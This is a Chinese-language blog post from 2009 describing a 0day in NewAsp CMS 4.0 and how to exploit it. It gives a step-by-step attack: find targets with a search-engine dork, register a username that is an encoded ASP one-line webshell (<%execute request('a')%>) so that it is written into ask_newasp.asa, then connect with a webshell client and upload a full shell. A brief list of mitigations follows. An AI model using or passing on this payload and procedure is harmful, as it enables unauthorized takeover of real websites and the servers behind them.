新云网站系统NewAsp CMS Version 4.0最新0day

2009, October 14, 1:52 PM. 漏洞集研
Submitted by admin

由于新云4.0对注册用户未过滤特殊字符,造成黑客通过脚本编码转换将一句话木马写入数据库文件,从而获得WEBSHELL权限。


测试:
  
   1. 打开www.g.cn   搜索关键字:Powered By NewAsp CMS Version 4.0 或 新云问吧
    
   2. 将<%execute request("a")%>  编码转换为 ┼攠數畣整爠煥敵瑳∨≡┩愾
  
   3. 以┼攠數畣整爠煥敵瑳∨≡┩愾   为用户名注册帐户

   4. 用一句话连接端连接 目标站点url/ask/data/ask_newasp.asa  ,密码为  a

   5.上传脚本大马或者执行其它操作,这里WEBSHELL权限已经获得。

预防:

    1.严格过滤注册用户名,限制注册用户名长度及禁止特殊符号。
    2.更改ask/data/ask_newasp.asa  路径及名称。
    3.给文件夹做权限设置,去除公共写入权限。

Tags: 新云, newasp

« 上一篇 | 下一篇 »

只显示10条记录相关文章
新云4.0注册上传漏洞(最新漏洞0day) (浏览: 9608, 评论: 0)
新云漏洞总结篇 (浏览: 22073, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):